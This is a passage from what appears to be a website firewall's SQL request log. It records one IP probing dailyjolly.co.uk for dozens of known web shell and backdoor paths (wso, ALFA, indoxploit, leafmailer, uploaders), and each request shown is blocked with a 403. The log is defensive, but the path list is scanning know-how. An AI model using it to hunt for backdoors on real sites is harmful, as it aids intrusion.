3.5.30729)\"}','K4HPbj3kaexWsnhCX5DcOJzN',0,1674319657.5065,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso1.php?http://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4t8yG0ezb1uK53OIjJshFvLg',0,1674319660.8607,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/olux.php?http://dailyjolly.co.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QtW4jkg9L7uTEqaOw0xcZbeR',0,1674319662.2875,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-info.php?http://dailyjolly.co.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Kjp0fPTJt5Fn3wCXqezxLOs8',0,1674319664.4372,199,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xl.php?http://dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Z4l0bPfCGzvOVxKjQBTMFrqH',0,1674319665.7960,195,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-confiig.php?http://dailyjolly.co.uk/wp-confiig.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','K1g6olEh0sZx2j79GDbNHpw4',0,1674319667.9256,212,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/file-manager.php?http://dailyjolly.co.uk/file-manager.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PaLWbv4jT1KoqUhiXHgDz37Y',0,1674319670.1780,198,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/uploader.php?http://dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pwgufZdVTcbKC64sqxFyE2Do',0,1674319672.0676,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leafmailer.php?http://dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NLeXWoCYGwJ20Opb6craSzqH',0,1674319675.1110,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','URuWy2nQBdHqxVaD0ozs1S63',0,1674319676.6710,227,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X2E4OQFZrxcSW9iYpGs5zujT',0,1674319679.5705,232,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/tmp_images/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/tmp_images/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eVQZhvJ63d9GCEIosMucrmTU',0,1674319683.3376,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-admin/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x9hCksLbuvZVT7eyqmKptAlU',0,1674319686.1010,188,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-content/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KDU4iQ0oJGlVzn3OWdx1qLXI',0,1674319690.1479,213,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-includes/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b8t4EMOTWIlRdikeu6N2oChK',0,1674319692.2101,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zDa1ZguU8mtbcopwVv74F6f0',0,1674319694.5024,303,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9HRm4BitgxwfrKv6Wp7OFUNX',0,1674319697.6313,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/files/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/files/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TigbPsJe6IL58t2OqDAjcxU4',0,1674319699.7370,200,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','P35S4Omya1ExVTCG8cfWwkrL',0,1674319701.5495,192,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa%22?http://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa%22','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','f3HX4wFGWI8TZlRnctVu5NMD',0,1674319703.8699,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3XGHnkAu27VBSgIqb6QerfOj',0,1674319705.2722,208,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RCDYL256GnlkmFaQyZehWHig',0,1674319708.2376,225,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','M8YXDT3mJuNknFOjU52atAz4',0,1674319710.4884,192,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/date.php?http://dailyjolly.co.uk/date.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X3N9IChFts76fjBumcPYvzlR',0,1674319712.4050,207,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/about.php?http://dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JV8ijtckdW7N2l9aPDbrQAzZ',0,1674319713.9463,244,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfaindex.php?http://dailyjolly.co.uk/alfaindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HEdLkap90K6TCyUe5qjroYFi',0,1674319715.8409,166,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.alf.php?http://dailyjolly.co.uk/.alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WrCg873RExBc2HTNqZpmojId',0,1674319718.0374,207,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/cekidot/alf.php?http://dailyjolly.co.uk/wp-content/plugins/cekidot/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XzDRyNlSJ56uivIqxHpULh3c',0,1674319722.1770,216,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/fw.php%22?http://dailyjolly.co.uk/wp-content/fw.php%22','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jwMXrO7bEcvKu5TpJsiIFkQW',0,1674319724.5314,167,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/alfa.php?http://dailyjolly.co.uk/wp-content/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hcfkY806d1sKGy5qrnCLPHaA',0,1674319726.7634,206,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/snd.php?http://dailyjolly.co.uk/snd.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bfKBrXGyESk4YT8tAjR1DU5V',0,1674319728.5152,281,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-class.php?http://dailyjolly.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wlD7IqJi0QRvb4KseagCjW9p',0,1674319730.1308,200,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/small.php?http://dailyjolly.co.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HCFmMs7g81NubQjTtKr5iJZB',0,1674319732.6125,229,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/upspy/index.php?http://dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xt4G1eZcSVEPmjRCkazsUd7W',0,1674319736.0039,219,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/ubh/index.php?http://dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V8tb1zFSx3D2eClJQEXdBImL',0,1674319738.5158,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache&http://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tN9I5SapH02bKqiOP3VodhG4',0,1674319740.1588,209,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?http://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KJCtasIPHGMOAXWRLdwkZeV8',0,1674319743.3147,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php?http://dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','utiMz4CgdEGA6nbZe29UfTRP',0,1674319746.9866,211,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi&http://dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fUZ4gbDi5Luc6s2QSy9v0wJn',0,1674319749.7050,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/html404/index.html?http://dailyjolly.co.uk/wp-content/plugins/html404/index.html','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PEA3HC70rMc8ewyQUZ1VKuvi',0,1674319752.1300,227,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php?http://dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZPsjNAu0xUc42adBVDJEFKTw',0,1674319755.8952,160,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Marvins.php?http://dailyjolly.co.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BObVMTy3tR9qdPDHQN08rFSU',0,1674319759.4046,158,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/css/modules.php?http://dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6volWEZGkALxH7w3XjCPK2Na',0,1674319761.3581,189,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/indoxploit.php?http://dailyjolly.co.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','slAWzZhkT7qjd903eUYfuaCJ',0,1674319763.3543,312,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php?http://dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wV7iH0jEOhDWavz3xsNf9URZ',0,1674319766.9893,224,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/css-ready/file.php?http://dailyjolly.co.uk/wp-content/plugins/css-ready/file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','njelZyawUVFdOkcb0goWfuqB',0,1674319769.3798,251,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/think.php?http://dailyjolly.co.uk/wp-content/think.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AEIhXl6Ws3g5dFentBCPiRxQ',0,1674319772.3496,258,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/html404/xccc.php?http://dailyjolly.co.uk/wp-content/plugins/html404/xccc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Hu4Q5gYXwdTrcj9LP2bAofn6',0,1674319773.8589,200,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/html404/cry.php.pjpeg?http://dailyjolly.co.uk/wp-content/plugins/html404/cry.php.pjpeg','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','52m0MEKn3eVxqQBHUdLXuPTz',0,1674319775.6074,273,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/html404/wso25.php?http://dailyjolly.co.uk/wp-content/plugins/html404/wso25.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','85geW4xqzu9QCJ1n7LDMGPlA',0,1674319778.8596,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php?http://dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','p9zD5B2g8RIouwAXsOyqNi1t',0,1674319782.6101,220,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/libraries/joomla/css.php?http://dailyjolly.co.uk/libraries/joomla/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gE3BOTksxzZ18DvVH70p9Xaq',0,1674319785.2397,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/libraries/joomla/jmails.php?u&http://dailyjolly.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7KekubVAgpcDX3ZBwIUoTGsl',0,1674319788.1457,194,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/libraries/joomla/jmail.php?u&http://dailyjolly.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MVs3XYjG0LWT8loS5QgOzpbK',0,1674319790.2069,197,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/images/vuln.php?http://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NnmDKhULiIEXtqkpl5FBHGYb',0,1674319793.4557,194,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/tmp/vuln.php?http://dailyjolly.co.uk/tmp/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pCRHB3os709AYTzmexMaPLOg',0,1674319796.1205,283,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/rxr.php?rxr&http://dailyjolly.co.uk/rxr.php?rxr','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6ypRfhOLKIbisudxvwa2Qjkm',0,1674319798.9591,186,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/modules/modules/modules.php?http://dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0QvXMb4BPWZC9ndaIqystwNE',0,1674319802.9223,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/error.php?http://dailyjolly.co.uk/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','t3gcn1XzF0298PGjNEwysLUu',0,1674319805.8664,172,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/RxR.php?http://dailyjolly.co.uk/RxR.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RG8b0JITiaFAfxEMWX6twgyk',0,1674319808.6700,162,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/components/com_b2jcontact/izoc.php?http://dailyjolly.co.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uQa1zAHlMhGFs2fTdYPgc73B',0,1674319811.4883,208,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/administrator/templates/bluestork/error.php?http://dailyjolly.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c5JzgZrusFa96IRBQj3wdvyt',0,1674319813.5509,213,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/administrator/templates/hathor/index.php?http://dailyjolly.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oRamvnxcIKHb1Y4FiUw85ElC',0,1674319817.8281,218,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/administrator/templates/hathor/error.php?http://dailyjolly.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','I4u8fNLEtVj97cOG6omKWMSn',0,1674319820.3084,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/administrator/templates/isis/index.php?http://dailyjolly.co.uk/administrator/templates/isis/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2qdILxVNetXm4B3or6WjA18P',0,1674319822.6375,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/administrator/templates/isis/error.php?http://dailyjolly.co.uk/administrator/templates/isis/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','j7WfhQdVgJFO4KpEA5zSi1ue',0,1674319828.3052,239,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez/index.php?http://dailyjolly.co.uk/templates/beez/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','biQUDHw2ZN6VaGT3dkfL9go8',0,1674319832.6293,213,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/ja_purity/index.php?http://dailyjolly.co.uk/templates/ja_purity/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; 